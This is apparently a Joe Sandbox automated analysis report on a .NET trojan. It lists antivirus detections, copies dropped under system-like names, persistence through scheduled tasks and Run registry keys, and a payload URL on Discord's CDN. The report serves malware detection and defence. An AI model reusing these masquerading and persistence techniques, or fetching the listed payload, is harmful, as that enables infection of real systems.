Defender 35->81 39 powershell.exe 35->39         started        41 powershell.exe 35->41         started        43 powershell.exe 35->43         started        signatures13 process14 process15 45 conhost.exe 39->45         started        47 conhost.exe 41->47         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    64AE5410F978DF0F48DCC67508820EA230C566967E002.exe29%MetadefenderBrowse
                    64AE5410F978DF0F48DCC67508820EA230C566967E002.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    64AE5410F978DF0F48DCC67508820EA230C566967E002.exe100%AviraTR/Blocker.aastp
                    64AE5410F978DF0F48DCC67508820EA230C566967E002.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe100%AviraTR/Blocker.aastp
                    C:\Recovery\JRFdtWyAvbQxLlvO.exe100%AviraTR/Blocker.aastp
                    C:\System Volume Information\Chkdsk\SearchUI.exe100%AviraTR/Blocker.aastp
                    C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe100%AviraTR/Blocker.aastp
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe100%AviraTR/Blocker.aastp
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe100%AviraTR/Blocker.aastp
                    C:\Recovery\csrss.exe100%AviraTR/Blocker.aastp
                    C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe100%Joe Sandbox ML
                    C:\Recovery\JRFdtWyAvbQxLlvO.exe100%Joe Sandbox ML
                    C:\System Volume Information\Chkdsk\SearchUI.exe100%Joe Sandbox ML
                    C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe100%Joe Sandbox ML
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe100%Joe Sandbox ML
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe100%Joe Sandbox ML
                    C:\Recovery\csrss.exe100%Joe Sandbox ML
                    C:\Recovery\JRFdtWyAvbQxLlvO.exe29%MetadefenderBrowse
                    C:\Recovery\JRFdtWyAvbQxLlvO.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\Recovery\csrss.exe29%MetadefenderBrowse
                    C:\Recovery\csrss.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\System Volume Information\Chkdsk\SearchUI.exe29%MetadefenderBrowse
                    C:\System Volume Information\Chkdsk\SearchUI.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe29%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe29%MetadefenderBrowse
                    C:\Windows\SysWOW64\comrepl\fontdrvhost.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\Windows\SysWOW64\iasnap\fontdrvhost.exe29%MetadefenderBrowse
                    C:\Windows\SysWOW64\iasnap\fontdrvhost.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe29%MetadefenderBrowse
                    C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe57%ReversingLabsByteCode-MSIL.Trojan.Tiggre
                    SourceDetectionScannerLabelLinkDownload
                    8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack100%AviraHEUR/AGEN.1203070Download File
                    8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack100%AviraHEUR/AGEN.1203070Download File
                    8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.4.unpack100%AviraHEUR/AGEN.1203070Download File
                    8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.10.unpack100%AviraHEUR/AGEN.1203070Download File
                    8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.8.unpack100%AviraHEUR/AGEN.1203070Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://cdn.discordapp.com4Gk0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cdn.discordapp.com
                    162.159.129.233
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpgfalse
                        high
                        https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpgfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-neti64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/2335464AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554390785.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554469458.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJ64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                                high
                                https://cdn.discordapp.com4Gk64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554326400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.672081969.0000000002AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.672141586.000000000499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.672127271.000000000556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.673640958.00000000050EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/11564914/23354;64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/2152978/2335464AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      http://cdn.discordapp.com64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554257510.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.671633909.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672488180.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672938172.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.673039261.0000000002C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.672141586.000000000499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.672127271.000000000556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.673640958.00000000050EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/mgravell/protobuf-net64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            https://steamcommunity.com/profiles/64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://cdn.discordapp.comJRFdtWyAvbQxLlvO.exe, 00000013.00000002.672938172.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554257510.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.671633909.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672488180.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.664966995.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.671410119.0000000005431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.671010760.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.159.130.233
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  162.159.129.233
                                                  cdn.discordapp.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  162.159.133.233
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:614288
                                                  Start date and time: 23/04/202208:11:492022-04-23 08:11:49 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 14m 59s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:42
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@55/25@14/3
                                                  EGA Information:
                                                  • Successful, ratio: 25%
                                                  HDC Information:
                                                  • Successful, ratio: 6.9% (good quality ratio 5.2%)
                                                  • Quality average: 65.7%
                                                  • Quality standard deviation: 41%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 181
                                                  • Number of non-executed functions: 5
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                                                  • Execution Graph export aborted for target 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, PID 5600 because it is empty
                                                  • Execution Graph export aborted for target JRFdtWyAvbQxLlvO.exe, PID 5048 because it is empty
                                                  • Execution Graph export aborted for target JRFdtWyAvbQxLlvO.exe, PID 5432 because it is empty
                                                  • Execution Graph export aborted for target SearchUI.exe, PID 5516 because it is empty
                                                  • Execution Graph export aborted for target csrss.exe, PID 1352 because it is empty
                                                  • Execution Graph export aborted for target csrss.exe, PID 2408 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimeTypeDescription
                                                  08:12:57API Interceptor3x Sleep call for process: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe modified
                                                  08:14:31Task SchedulerRun new task: csrss path: "C:\Recovery\csrss.exe"
                                                  08:14:32Task SchedulerRun new task: fontdrvhost path: "C:\Windows\System32\iasnap\fontdrvhost.exe"
                                                  08:14:32API Interceptor4x Sleep call for process: csrss.exe modified
                                                  08:14:32AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Recovery\csrss.exe"
                                                  08:14:34Task SchedulerRun new task: JRFdtWyAvbQxLlvO path: "C:\Recovery\JRFdtWyAvbQxLlvO.exe"
                                                  08:14:35API Interceptor2x Sleep call for process: JRFdtWyAvbQxLlvO.exe modified
                                                  08:14:36Task SchedulerRun new task: SearchUI path: "C:\System Volume Information\Chkdsk\SearchUI.exe"
                                                  08:14:37API Interceptor2x Sleep call for process: SearchUI.exe modified
                                                  08:14:39Task SchedulerRun new task: ShellExperienceHost path: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe"
                                                  08:14:42AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Windows\System32\comrepl\fontdrvhost.exe"
                                                  08:14:50API Interceptor2x Sleep call for process: ShellExperienceHost.exe modified
                                                  08:14:51AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run JRFdtWyAvbQxLlvO "C:\Recovery\JRFdtWyAvbQxLlvO.exe"
                                                  08:15:20AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SearchUI "C:\System Volume Information\Chkdsk\SearchUI.exe"
                                                  08:15:41AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe"
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):414
                                                  Entropy (8bit):5.836499924053923
                                                  Encrypted:false
                                                  SSDEEP:6:4utweVsqDhCcrqHBkZRtpjWHrJJEOn1Ln6cjYag270cUcwVkth81SwijUfj0gMVA:jBdX6kVpyH1fLn6gxpEIjjUfwVfgd
                                                  MD5:2D8D12C01C2DBE898F8449E10ED794F1
                                                  SHA1:A40D0B06A0C5F11909FA7805EFCD724A4D7ED266
                                                  SHA-256:C2313F1C93CC3B2EA47E0814F71B6C80E9DE03B993A659DCE46A0609C26CD19C
                                                  SHA-512:50CC8F5D3DB3DA829E5847177EEC0D98C6A2220682A08F70C6EBC79D26F8F64A58F222C38221D9D52FA12F68D60879A338C305CE3C2BCA2B76D0077F7113EFAC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:0oBYQK3QobKQBaFFUgMVoaKKaCf0HfroAScfQFcs3xcBoVSHO2LEWPuae17OpCIItgQs8jyPEeb07IgFuXmOTnSvhCAZHOD1oUSHEjJoE6A1x3cVU2eRZ4yGOfL5iZHzbkMnzZAKO8KWma7njpFPuvbufM2jYNFpzLaNryg51TDbtbdyhhV3T1FpIbImgbwB2fhb9u5vJKYasAADtEC01LV8FvEQq3YagBiO4CywlkuJdo7IaE3bY6JrKiVOppEQv74qbwIqPPOQaLfay6zl96Bk11DVqkH6feYfuQqn6NMJr3Q8D5aszdRy6Tyjsw9pHSu6xAphPMpvu128lFSvKYGCNjibbH5JNgBYITLDP2cnxfDEaz8neOetMrsNbOFIRfhNze0R3PfR5cOsfdAmJRp9CSMal8
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):897
                                                  Entropy (8bit):5.899936672877204
                                                  Encrypted:false
                                                  SSDEEP:24:5QI5YKo8Dl/jpiSQdMdpvwzOIHck12emy8ff:557oQl/jbQdUvwz38kvmy8ff
                                                  MD5:0F5FE5B8B5A2E5B4C91CE20DADB17012
                                                  SHA1:BF8BFFDBDD478B023D0242C27593C9C1DD60391E
                                                  SHA-256:4D88562F22D5A1BE76577FBB45EBB5EB153BDAAFBBFDD3367A03FA47BBFCE293
                                                  SHA-512:CFD2EE4107FD155B80FA379A4CCE38B74716A7F74674F58B519E567D4731697AF3FA51BFAC62BCEF11818A96B15E9EB7BD04D3B21B7F3F4A3883B500DED77704
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:4sM9Pl62bFVbwNqemxpUVM16QiN7bzBZkFxBuCDHVTuF4qBgpGJ0bThs1QtrX8alD60qaptkuh8CbvBjgrSUqL8QhEJeTWuW2IB8zUFAWjF3VfQFPKLqqG528jJVfPQYxlJTuCtLlR8HFE5CyEOJLDqwMI9QLufGSrFtV6VMa9FYHyx3nGgaAHNt5XGlCd91w1yX9Mq2tCsL8RoYUGmENEFKdVx8zuJ6ANmQ9a4baor8YCvotrQ614osvo3nZsC93wKuoXZ4MLoiWHwbkJPIdMFGj4eVgQBsmsEm1A9VSVuqPFVo2cCQc4fqqELu3EY5J55nDJjkJ4zIcZ0dj0dENvPsNX6xzPbO7yhUKrls2cHiEXNROrLDkTrXqNapNwv3clLo2gT1PuMvoro0JojHEYnnGJn6R5fFrNFcMjZrXTx0H6s8jkfiNnyE8hhs2XkTPGEblLnkP1uvkwfKboXqa72DYBeoCqzAtelA2RXX65SV3DdLCWRN933ROACjr9hjCtBFLeSJR9ueogKViSmpZlA0lTw2Pyq6XtTJCX9hEH69IYnrzqBYX2KasLe2sa4cTxH5NATKSEkRpBrNqECixRjei3b02HyoNdqVRreyX0GSR3ureRLoXVpCOmWUjcRLP6DMUV68jOK7KQNpItWl5JQ1xnHoUKP5i4DUzhWIVNFJLs17ZqLzGqPGqMZrORnZ8PYQN20lXNPsEGqEvJPo9Zy1p7onIp3EjqK5Tlug0kc2ahBjfU5FC9ajahlQONcsULJY6uvKZsyY76aI5EHytyBjQlewAeSnHtiOXmnvivpTLBleGcUJFo8fJjIUP8J4ZLRNYMuTbWP7IsXOAAqhJJhdvCFxdTgklu3AuXG4sBstYAWbM3UPSmvQnxcVG6zIz
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):806
                                                  Entropy (8bit):5.884302323395575
                                                  Encrypted:false
                                                  SSDEEP:24:09kjI4gZSk4ccHOeMKLRBnzXMS39JGPEJKhjt:akjI40SP/cKLRBnz8SHKhR
                                                  MD5:A575F771BA5E4DB8138DF0F9F6C33A7D
                                                  SHA1:3967941F2FFE83B05697ED8D37BF18D25B0189E2
                                                  SHA-256:17A3327291F87250DF82B1BE3FF3C1A66EF17034C60D8B7E890332F408E841CE
                                                  SHA-512:0F98F2651616444C93CAB6E5BEF9EC0067486A835C7CB0D947B2E244AEB471CF0A63E77F810AFA460708E0C39A5CFBC802BD27EE2B1BDBACF98E823A246A33C6
                                                  Malicious:false
                                                  Reputation:unknown
